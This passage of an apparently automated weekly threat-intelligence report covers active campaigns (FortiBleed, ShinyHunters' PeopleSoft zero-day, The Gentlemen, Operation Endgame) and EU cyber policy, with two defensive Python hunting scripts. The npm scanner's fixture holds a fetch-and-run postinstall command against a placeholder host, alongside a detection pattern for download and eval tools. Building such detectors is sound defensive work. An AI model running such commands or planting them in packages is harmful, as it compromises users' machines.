— *Source: [ESET WeLiveSecurity](https://www.welivesecurity.com/en/eset-research/gamaredon-2025-leveraging-tunnels-workers-dead-drops-new-alliances/) · [Sekoia](https://www.sekoia.com/blog/fsbs-matryoshka-3-3-gamaredons-gifts-that-keeps-unpacking-gammasteel) · [Daily brief 06-26](briefs/2026-06-26.md) · Tags: nation-state, espionage, russia-nexus · Region: europe · Sector: public-sector, defense*

## 8. Long-running campaigns — status update

### FortiBleed (`key: fortibleed`)

The W25 top story continued without a scale revision — the device count holds at the 86,644 figure the dailies reported — but the in-window development is the clearest state-interest signal yet: CISA [updated its hardening alert on 06-22](https://www.cisa.gov/news-events/alerts/2026/06/18/cisa-urges-hardening-fortinet-devices-after-reports-of-credential-exposure) to link Fortinet's revised guidance, and reporting now confirms that in mid-June the Russian-speaking operator completed offline Kerberos-hash cracking from captured FortiGate configs and immediately exfiltrated DFS backup data from a NATO-aligned defence contractor — a full AD domain takeover ([Security Affairs](https://securityaffairs.com/194004/hacking/fortibleed-the-most-detailed-breakdown-yet-of-an-active-russian-credential-harvesting-operation.html)). Outstanding for defenders: treat any FortiGate admin/VPN credential active May–June 2026 as compromised, rotate, then hunt AD for pass-the-hash, DCSync and DFS-backup exfiltration (Kerberos ticket anomalies, LSASS access, `ntdsutil`/impacket artefacts). Patch level is irrelevant — this is credential reuse, not a new CVE.

— *Source: [CISA alert](https://www.cisa.gov/news-events/alerts/2026/06/18/cisa-urges-hardening-fortinet-devices-after-reports-of-credential-exposure) · [Security Affairs](https://securityaffairs.com/194004/hacking/fortibleed-the-most-detailed-breakdown-yet-of-an-active-russian-credential-harvesting-operation.html) · Tags: actively-exploited, data-breach, identity, russia-nexus · Region: global, europe, switzerland · Sector: public-sector, defense, telco*

### ShinyHunters / UNC6240 Oracle PeopleSoft campaign (`key: shinyhunters-peoplesoft`)

The campaign behind the § 1 NAIC breach. GTIG/Mandiant attributes to UNC6240 an active zero-day exploitation of Oracle PeopleSoft (CVE-2026-35273) between May 27 and June 9, predating Oracle's advisory; staging environments deployed customised MeshCentral agents masquerading as cloud endpoints, then ran a per-victim `[victim]_fanout.sh` lateral-movement-and-defacement script ([Google GTIG](https://cloud.google.com/blog/topics/threat-intelligence/shinyhunters-targets-education-sector-oracle-exploit)). ~300 PeopleSoft instances compromised, ~100 organisations notified, 68% higher education, with the University of Nottingham among the first named public victims ([SecurityWeek](https://www.securityweek.com/google-confirms-exploitation-of-oracle-peoplesoft-zero-day-by-shinyhunters/)). The status this week: NAIC confirmed (§ 1), and notifications are still landing, so more European education and public-finance victims are likely. The weekly lens: this is ShinyHunters operating as a zero-day-capable ERP attacker — a capability shift from the brand's 2021–2024 credential-stuffing persona. Outstanding question: which EU universities running PeopleSoft are in the un-notified tail.

— *Source: [Google GTIG / Mandiant](https://cloud.google.com/blog/topics/threat-intelligence/shinyhunters-targets-education-sector-oracle-exploit) · [SecurityWeek](https://www.securityweek.com/google-confirms-exploitation-of-oracle-peoplesoft-zero-day-by-shinyhunters/) · Tags: data-breach, zero-day, actively-exploited, organized-crime · Region: global, us, europe · Sector: education, finance, public-sector · CVE: CVE-2026-35273 · CVSS: 9.8 · Vector: zero-click · Auth: pre-auth · Status: exploited*

### The Gentlemen (`key: the-gentlemen`)

The W25 multi-day item now has primary-evidence depth (the ESET deep-dive, § 7) and a sharp Swiss angle: Check Point data, reported by Swiss tech press, makes [Switzerland the second-most-targeted European country](https://www.inside-it.ch/aufstrebende-ransomware-bande-findet-mehr-schweizer-opfer-20260626) for the operation, which now claims 478 victims and has added worm propagation. The operationally important link is that victim selection runs on FortiGate misconfiguration scanning — so a Swiss organisation's FortiBleed exposure (above) is also its Gentlemen-victim-selection exposure. Outstanding for defenders: the same FortiGate hardening that closes FortiBleed reduces Gentlemen targeting, and EDR-tamper-protection plus driver-blocklist enforcement is the GentleKiller counter.

— *Source: [inside-it.ch](https://www.inside-it.ch/aufstrebende-ransomware-bande-findet-mehr-schweizer-opfer-20260626) · [ESET WeLiveSecurity](https://www.welivesecurity.com/en/eset-research/killing-me-gently-inside-gentlemens-edr-killer-framework/) · Tags: ransomware, organized-crime, russia-nexus · Region: switzerland, dach, europe · Sector: manufacturing, healthcare, energy*

### Operation Endgame (`key: operation-endgame`)

Europol's law-enforcement campaign extended its reach this week: the 06-24/25 Amadey and StealC takedown actioned 326 servers and 142 domains and recovered approximately 27 million stolen credentials from over 385,000 compromised systems ([BleepingComputer](https://www.bleepingcomputer.com/news/security/amadey-stealc-malware-operations-disrupted-in-operation-endgame-action/)), with Microsoft providing the Amadey/StealC infrastructure analysis ([Microsoft](https://www.microsoft.com/en-us/security/blog/2026/06/24/stealc-and-amadey-breaking-down-infostealers-and-the-cybercrime-services-that-deliver-them/)). Combined with the W25 SocGholish/TA569 seizure (106 servers), Endgame has now dismantled three commodity delivery-and-theft networks in quick succession. The defender gap: no arrests were announced for this phase, so infrastructure can reconstitute — cross-reference the recovered 27M credentials against your identity-store canaries and hunt Amadey persistence (`HKCU` run-key, `rundll32`/`regsvr32` side-loads, short-lived child processes under `%AppData%\Roaming`).

— *Source: [BleepingComputer](https://www.bleepingcomputer.com/news/security/amadey-stealc-malware-operations-disrupted-in-operation-endgame-action/) · [Microsoft Threat Intelligence](https://www.microsoft.com/en-us/security/blog/2026/06/24/stealc-and-amadey-breaking-down-infostealers-and-the-cybercrime-services-that-deliver-them/) · [Europol newsroom](https://www.europol.europa.eu/media-press/newsroom/news/global-cyber-strike-disrupts-socgholish-amadey-and-stealc-malware-networks) · Tags: law-enforcement, infostealer, botnet, organized-crime · Region: europe, global · Sector: public-sector, finance*
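
An added example (not Microsoft's or BleepingComputer's detection content) that runs the three Amadey persistence indicators listed above over constructed Sysmon-style events: the HKCU Run-key value, `rundll32`/`regsvr32` loading a DLL from the user profile, and short-lived children of a binary under `%AppData%\Roaming` (interpreted here as processes whose parent image lives in that directory and that exit within five seconds). The 5-second threshold, the `alice` profile path and the `abcd1234` directory name are assumptions; the timestamps are plain seconds.

```python
"""Hunt endpoint telemetry (registry-set, process-create, process-end events
flattened to dicts) for three commodity-loader persistence patterns: an HKCU
Run-key value pointing into the user profile, rundll32/regsvr32 loading from
AppData\\Roaming, and short-lived children of a profile-resident binary."""
from __future__ import annotations
import re

RUN_KEY_RE = re.compile(r"^HKCU\\(?:Software\\)?Microsoft\\Windows\\CurrentVersion\\Run\\", re.I)
PROFILE_DIR_RE = re.compile(r"\\AppData\\(?:Roaming|Local\\Temp)\\", re.I)
SIDELOAD_HOSTS = {"rundll32.exe", "regsvr32.exe"}
SHORT_LIVED_SECONDS = 5.0   # assumption: children exiting this fast match the pattern

def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def hunt(events: list[dict]) -> list[dict]:
    """Stateless checks for the registry and side-load rules; process lifetime
    needs state, so creates are remembered by pid until the matching end."""
    alerts: list[dict] = []
    started: dict[int, dict] = {}
    for ev in sorted(events, key=lambda e: e["t"]):
        kind = ev["type"]
        if kind == "registry_set":
            if RUN_KEY_RE.match(ev["target"]) and PROFILE_DIR_RE.search(ev["data"]):
                alerts.append({"rule": "hkcu_run_key_to_profile", "t": ev["t"],
                               "detail": f'{ev["target"]} = {ev["data"]}'})
        elif kind == "process_create":
            started[ev["pid"]] = ev
            if _basename(ev["image"]) in SIDELOAD_HOSTS and PROFILE_DIR_RE.search(ev["cmdline"]):
                alerts.append({"rule": "lolbin_sideload_from_profile", "t": ev["t"],
                               "detail": ev["cmdline"]})
        elif kind == "process_end":
            start = started.pop(ev["pid"], None)
            if start is None:
                continue
            lifetime = ev["t"] - start["t"]
            if lifetime <= SHORT_LIVED_SECONDS and PROFILE_DIR_RE.search(start["parent_image"]):
                alerts.append({"rule": "short_lived_child_of_profile_binary", "t": ev["t"],
                               "detail": f'{_basename(start["image"])} lived {lifetime:.1f}s '
                                         f'under {start["parent_image"]}'})
    return alerts

# Constructed sample events (no real host data).
APPDATA = "C:\\Users\\alice\\AppData\\Roaming"
SAMPLE_EVENTS = [
    {"type": "registry_set", "t": 100.0,
     "target": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Updater",
     "data": APPDATA + "\\abcd1234\\update.exe"},
    {"type": "registry_set", "t": 101.0,                                   # benign autostart
     "target": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\OneDrive",
     "data": "C:\\Program Files\\Microsoft OneDrive\\OneDrive.exe /background"},
    {"type": "process_create", "t": 102.0, "pid": 4101,
     "image": "C:\\Windows\\System32\\rundll32.exe",
     "parent_image": APPDATA + "\\abcd1234\\update.exe",
     "cmdline": "rundll32.exe " + APPDATA + "\\abcd1234\\cred64.dll,Main"},
    {"type": "process_create", "t": 103.0, "pid": 4102,
     "image": "C:\\Windows\\System32\\cmd.exe",
     "parent_image": APPDATA + "\\abcd1234\\update.exe", "cmdline": "cmd.exe /c whoami"},
    {"type": "process_end", "t": 103.4, "pid": 4102},
    {"type": "process_create", "t": 110.0, "pid": 4103,                    # benign shell
     "image": "C:\\Windows\\System32\\cmd.exe",
     "parent_image": "C:\\Windows\\explorer.exe", "cmdline": "cmd.exe"},
    {"type": "process_end", "t": 400.0, "pid": 4103},
]

if __name__ == "__main__":
    for a in hunt(SAMPLE_EVENTS):
        print(a["t"], a["rule"], a["detail"])
```

The lifetime correlation is the part a flat rule cannot express: it needs the create event kept until the matching end arrives, which is why the events are processed in time order.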

## 9. Policy & regulatory horizon

### Netherlands NIS2 (Cyberbeveiligingswet) clears the lower house — entry into force targeted for 1 July 2026

The Dutch transposition is in its final step: the Tweede Kamer (lower house) approved the Cyberbeveiligingswet on 15 April 2026 ([Rijksoverheid](https://www.rijksoverheid.nl/actueel/nieuws/2026/04/15/tweede-kamer-stemt-in-met-wetsvoorstellen-cyberbeveiligingswet-en-wet-weerbaarheid-kritieke-entiteiten)), with the Eerste Kamer (upper-house) ratification vote still pending in late June and the government targeting 1 July 2026 for entry into force. NCSC-NL is the designated supervisor; the regime runs a three-step 24h / 72h / one-month incident-notification protocol, essential-entity penalties up to €10M or 2% of turnover, and personal board liability for security-measure oversight ([NL Digital Government](https://www.nldigitalgovernment.nl/nis2-directive-cyberbeveiligingswet-cbw/)). This is the fresh delta on the W25 NIS2-transposition item, which listed the Netherlands as pending; France, Ireland, Luxembourg and Spain remain non-transposed. What changes for defenders: any essential/important entity with Dutch operations or Dutch counterparties is about to face an enforceable notification clock and a named supervisor — wire NCSC-NL's 24/72-hour flow into the incident-response runbook now, and re-check which group entities fall in scope.

— *Source: [Rijksoverheid — Tweede Kamer vote](https://www.rijksoverheid.nl/actueel/nieuws/2026/04/15/tweede-kamer-stemt-in-met-wetsvoorstellen-cyberbeveiligingswet-en-wet-weerbaarheid-kritieke-entiteiten) · [NL Digital Government — Cyberbeveiligingswet](https://www.nldigitalgovernment.nl/nis2-directive-cyberbeveiligingswet-cbw/) · [uComply advisory](https://ucomply.cloud/en/blog/cyberbeveiligingswet-1-juli-2026-wat-moet-u-nu-regelen/) · Tags: law-enforcement, eu-nexus · Region: europe · Sector: public-sector*

### EU Commission proposes a major Europol / Eurojust mandate expansion

On 24 June the Commission tabled COM(2026) 580 proposing to expand Europol and Eurojust: automated, near-real-time national-police-to-Europol data upload via a new "Police Shared Data Space" cloud, Europol Support Offices embedded in Member-State agencies, an explicit Eurojust cybercrime mandate, and a roughly doubled (~€3bn) budget, with cybercrime and AI-accelerated threats cited as primary drivers ([European Commission](https://commission.europa.eu/news-and-media/news/commission-proposes-new-measures-better-tackle-cross-border-crime-and-terrorism-2026-06-24_en)). The Protect Not Surveil coalition [warns](https://protectnotsurveil.eu/resources/press-release-europol-mandate-overhault-2026/) of systematic data ingestion without categorisation safeguards. This is co-decision and unlikely to bind before 2027+, but public-sector CISOs in EU Member States should track it now: it reshapes how incident and victim data may flow to Europol, with data-protection and onward-sharing implications for breach reporting.

— *Source: [European Commission](https://commission.europa.eu/news-and-media/news/commission-proposes-new-measures-better-tackle-cross-border-crime-and-terrorism-2026-06-24_en) · [Protect Not Surveil](https://protectnotsurveil.eu/resources/press-release-europol-mandate-overhault-2026/) · Tags: law-enforcement, eu-nexus · Region: europe · Sector: public-sector*

### EU Cyber Resilience Act — 75 days to the 11 September vulnerability/incident-reporting obligation

CRA Article 28 (conformity-body notification) entered force on 11 June 2026; the next binding milestone — mandatory vulnerability/incident reporting by manufacturers to ENISA's Single Reporting Platform — activates 11 September 2026, now ~75 days out ([ENISA SRP](https://www.enisa.europa.eu/topics/product-security-and-certification/single-reporting-platform-srp)). ENISA has not yet published a dry-run schedule, stating guidance is due June–August ([Crowell & Moring](https://www.crowell.com/en/insights/client-alerts/eu-cyber-resilience-act-countdown-11-september-2026-incidentvulnerability-reporting-deadline-is-less-than-100-days-away)). For Swiss readers the practical action is procurement-side: Swiss manufacturers selling digital products into the EU fall in scope, and Swiss public-sector procurement teams should add CRA compliance attestations to vendor specs and confirm in-scope suppliers can meet the 24/72-hour SRP reporting flow before it binds.

— *Source: [ENISA Single Reporting Platform](https://www.enisa.europa.eu/topics/product-security-and-certification/single-reporting-platform-srp) · [Crowell & Moring advisory](https://www.crowell.com/en/insights/client-alerts/eu-cyber-resilience-act-countdown-11-september-2026-incidentvulnerability-reporting-deadline-is-less-than-100-days-away) · Tags: law-enforcement, eu-nexus · Region: europe · Sector: public-sector, technology*

## 10. Looking ahead — what to watch next week

A focused, justified list — items already in motion, not predictions.

- **ShinyHunters PeopleSoft notifications are still landing — expect more named European education and public-finance victims.** GTIG has notified ~100 organisations (68% higher education) and NAIC is the fresh high-profile case; patch internet-reachable PeopleSoft and hunt `/PSEMHUB/` and `/PSIGW/HttpListeningConnector`. ([Google GTIG](https://cloud.google.com/blog/topics/threat-intelligence/shinyhunters-targets-education-sector-oracle-exploit); [daily 06-28](briefs/2026-06-28.md))
- **FortiBleed is not a one-and-done credential reset — full AD domain takeover is now confirmed at a NATO-aligned contractor.** Finish session termination and credential rotation, then hunt for post-compromise AD persistence (Kerberos abuse, DCSync, DFS-backup exfiltration) rather than assuming the reset closed it. ([CISA](https://www.cisa.gov/news-events/alerts/2026/06/18/cisa-urges-hardening-fortinet-devices-after-reports-of-credential-exposure); [daily 06-24](briefs/2026-06-24.md))
- **The Klue/Icarus extortion surface is multiplying after the "resolution" — a second group is now extorting ~195 listed organisations.** Any firm with a Klue/Salesforce integration should expect renewed extortion contact regardless of Icarus's stated data deletion; complete OAuth-grant revocation and CRM-egress monitoring. ([SecurityWeek](https://www.securityweek.com/more-klue-breach-victims-identified-as-hackers-get-hacked/); [daily 06-27](briefs/2026-06-27.md))
- **CRA Single Reporting Platform go-live is ~75 days out (11 September); ENISA's dry-run schedule is due now.** In-scope manufacturers — including Swiss exporters to the EU — should register and wire the 24/72-hour reporting flow into their PSIRT process before the obligation binds. ([ENISA SRP](https://www.enisa.europa.eu/topics/product-security-and-certification/single-reporting-platform-srp))
- **EDPB Article 33 harmonised breach-notification template consultation closes 5 August.** Still open with no in-window change; multi-jurisdiction breach-response owners have a closing window to comment before the EDPB sets a mandatory-adoption timeline. ([EDPB](https://www.edpb.europa.eu/news/edpb-meets-with-eu-commissioner-mcgrath-and-adopts-common-data-breach-notification-template_en))
- **npm v12 will disable install scripts by default — the week's Miasma worm wave is the reminder to audit CI now.** Miasma's `postinstall`-and-`SessionStart`-hook propagation is exactly the kill chain `--ignore-scripts` / npm v12 defaults neutralise; inventory pipelines and AI-coding-tool hook configs that rely on build scripts. ([Socket](https://socket.dev/blog/miasma-mini-shai-hulud-hits-leoplatform-npm-packages-go-ecosystem); [daily 06-27](briefs/2026-06-27.md))
- **libssh2 CVE-2026-55200 has a public PoC and an upstream fix commit, but tagged releases lag across the binding ecosystem — track the embedded-dependency fix pipeline.** Inventory appliances, tooling and language bindings that ship libssh2 and chase each vendor's release rather than assuming a single library bump closes it. ([NCSC-NL](https://advisories.ncsc.nl/2026/ncsc-2026-0210.html); [daily 06-28](briefs/2026-06-28.md))
- **Scattered Spider TfL sentencing is set for 16 July.** First UK court outcome on the campaign; the vishing/social-engineering TTP precedent is directly relevant to European transport and public-sector identity-desk hardening. ([UK NCA](https://www.nationalcrimeagency.gov.uk/news/cyber-criminals-who-hacked-into-transport-for-londons-computer-network-are-convicted); [daily 06-23](briefs/2026-06-23.md))
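
An added example for the two hook points in the npm item above (not Socket's or npm's tooling): it inventories install-phase scripts across a constructed `node_modules` tree, flags script bodies that fetch or evaluate remote content for review, checks whether `.npmrc` already sets `ignore-scripts=true`, and collects `SessionStart` hook commands from JSON settings files. The `.claude/settings.json` path and its `hooks` layout are assumptions about one tool's configuration, so the scanner matches any `SessionStart` key rather than a fixed schema; the package names and hook command are invented.

```python
"""Inventory the two hooks an install-time npm worm can abuse: package.json
lifecycle scripts that run during install, and SessionStart hooks in AI
coding-tool settings.  Works over an in-memory {path: content} tree so it
runs offline; point it at a real checkout by reading files into that shape."""
from __future__ import annotations
import json
import posixpath
import re

INSTALL_PHASES = ("preinstall", "install", "postinstall", "prepare")
# Script bodies that pull or evaluate remote content deserve a human look.
SUSPICIOUS_RE = re.compile(r"\b(curl|wget|Invoke-WebRequest|node\s+-e|eval|base64)\b")

def install_scripts(tree: dict[str, str]) -> list[dict]:
    """Every install-phase script declared in any package.json in the tree."""
    found = []
    for path, body in sorted(tree.items()):
        if posixpath.basename(path) != "package.json":
            continue
        pkg = json.loads(body)
        for phase in INSTALL_PHASES:
            cmd = pkg.get("scripts", {}).get(phase)
            if cmd:
                found.append({"package": pkg.get("name", path), "phase": phase,
                              "command": cmd, "review": bool(SUSPICIOUS_RE.search(cmd))})
    return found

def session_start_hooks(tree: dict[str, str]) -> list[dict]:
    """Command strings found anywhere below a `SessionStart` key in JSON settings."""
    hits = []
    def walk(node, armed, path):
        if isinstance(node, dict):
            for key, val in node.items():
                if armed and key == "command" and isinstance(val, str):
                    hits.append({"file": path, "command": val})
                walk(val, armed or key == "SessionStart", path)
        elif isinstance(node, list):
            for item in node:
                walk(item, armed, path)
    for path, body in sorted(tree.items()):
        if path.endswith(".json") and posixpath.basename(path) != "package.json":
            try:
                walk(json.loads(body), False, path)
            except json.JSONDecodeError:
                continue
    return hits

def scripts_ignored(npmrc: str) -> bool:
    """True when .npmrc already sets ignore-scripts=true for this project."""
    for line in npmrc.splitlines():
        key, _, val = line.partition("=")
        if key.strip() == "ignore-scripts":
            return val.strip().lower() == "true"
    return False

# Constructed sample tree (no real packages; example.invalid is a reserved name).
SAMPLE_TREE = {
    "package.json": json.dumps({"name": "example-app", "scripts": {"test": "jest"}}),
    "node_modules/native-thing/package.json": json.dumps(
        {"name": "native-thing", "scripts": {"install": "node-gyp rebuild"}}),
    "node_modules/totally-fine-utils/package.json": json.dumps(
        {"name": "totally-fine-utils",
         "scripts": {"postinstall": "curl -s https://example.invalid/setup.sh | sh"}}),
    "node_modules/plain-lib/package.json": json.dumps({"name": "plain-lib"}),
    ".claude/settings.json": json.dumps(          # assumed layout, see lead-in
        {"hooks": {"SessionStart": [{"hooks": [{"type": "command",
                                                "command": "node .devtools/bootstrap.js"}]}]}}),
    ".npmrc": "registry=https://registry.npmjs.org/\n",
}

if __name__ == "__main__":
    print("ignore-scripts set:", scripts_ignored(SAMPLE_TREE[".npmrc"]))
    for s in install_scripts(SAMPLE_TREE):
        print("REVIEW" if s["review"] else "ok    ", s["package"], s["phase"], s["command"])
    for h in session_start_hooks(SAMPLE_TREE):
        print("hook  ", h["file"], h["command"])
```

A legitimate native module with `install: node-gyp rebuild` lands in the inventory too: the point is to know which packages still need install scripts before flipping `ignore-scripts` on, so the build does not silently break when the npm v12 default arrives.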

## 11. Verification & coverage notes

- **Single-source / attributed claims.** The "second extortion group" in the Klue/Icarus item (§ 2) and its claim of ~195 listed organisations rest on a single primary (The Next Web, relaying a private Klue customer update obtained by TechCrunch); the allegation that Klue paid the original Icarus operator is unverified and is attributed as a claim, not stated as fact. The NAIC 3.1 TB figure is ShinyHunters' own claim relayed by tech press; NAIC confirms the breach and the rating-feed pause but not the volume. The "Switzerland is the second-most-targeted European country" ranking for The Gentlemen (§§ 0, 8) rests on a single source (inside-it.ch relaying Check Point data); the co-cited ESET paper does not state a European country ranking, and inside-it.ch returns 403 to the routine's fetcher, so the specific ranking could not be independently re-verified this run — it is attributed, not asserted as established fact.
- **Unresolved contradiction.** Texas Parks & Wildlife (§ 5): the daily flagged a discrepancy between the public statement and the state AG filing over whether SSNs were exposed; unresolved this week, carried as a confidence caveat.
- **Items considered and dropped (may resurface).** RoguePlanet (CVE-2026-50656) — carried in the W25 looking-ahead but no fresh in-window source on a Microsoft fix, so dropped rather than re-asserted stale. eBanking IPv4-mapped-IPv6 phishing (06-22), the Brazil Cell Broadcast hijack (single-source, and outside the audience nexus beyond the § 4 mention), Arystinger botnet (06-22), Prinz Eugen ransomware (06-21) and Payouts King/Edgecution (06-25) did not clear W-PD-1 (inaction = incident / cross-day pattern / strategic horizon) and were left to the dailies. The MISP 2.5.42 CVEs (06-25) and ILIAS SQLi (06-23) are folded into §§ 3–4 rather than given standalone roll-up entries.
- **Reduced confidence.** StrikeShark China-nexus attribution is Kaspersky's *low-confidence* assessment and is reported as such (§ 6).
- **libssh2 patch-status caveat (§ 3).** The GHSA references an upstream fix commit and NCSC-NL NCSC-2026-0210 is titled as a fix advisory, so the item is marked `patch-available`; however, tagged-release availability lags across the binding/appliance ecosystem, so a given deployment may still be effectively unpatched pending its embedding vendor's release. Treat `patch-available` as "fix exists upstream," not "your appliance is fixed."
- **Sub-agents.** Both horizon sub-agents (W1 threat-actor/campaign/research; W2 strategic/policy) returned within cap. No coverage axis was abandoned.
- **Verification iterations:** 5 · residuals: 0 — verdict CLEAN on iteration 5, with model rotation across iterations (opus on 1/3/5, sonnet on 2/4). Iterations 1–4 remediated ~21 findings (URL corrections, an MSG→ShinyHunters attribution overclaim, a Miasma quantifier inflation, a Netherlands NIS2 "transposition done" factual overclaim, and several date/citation-anchor gaps); iteration 5 found no truth or editorial defects.
- **Coverage gaps.** databreaches-net (transport-403, 3rd consecutive run — content reached via GTIG/SecurityWeek primaries instead); mandiant-gtig (RSS feed returned IncompleteRead, content obtained via WebSearch + the GTIG blog directly); inside-it-ch (Cloudflare-challenged for the W2 sub-agent UA, but the 06-26 Gentlemen article was reachable and is cited). W2 "outside-window" sources (cert-eu, edpb, bsi-de, enisa-nis360, cisa-directives) were quiet in-window, not failed fetches. The end-of-run `tools/source_health.py` accessibility probe did not complete inside its budget in this container (slow under the egress proxy) and was stopped so it would not block publish; the prior committed snapshot (from the 2026-06-28 daily run) stands and the next run re-probes.
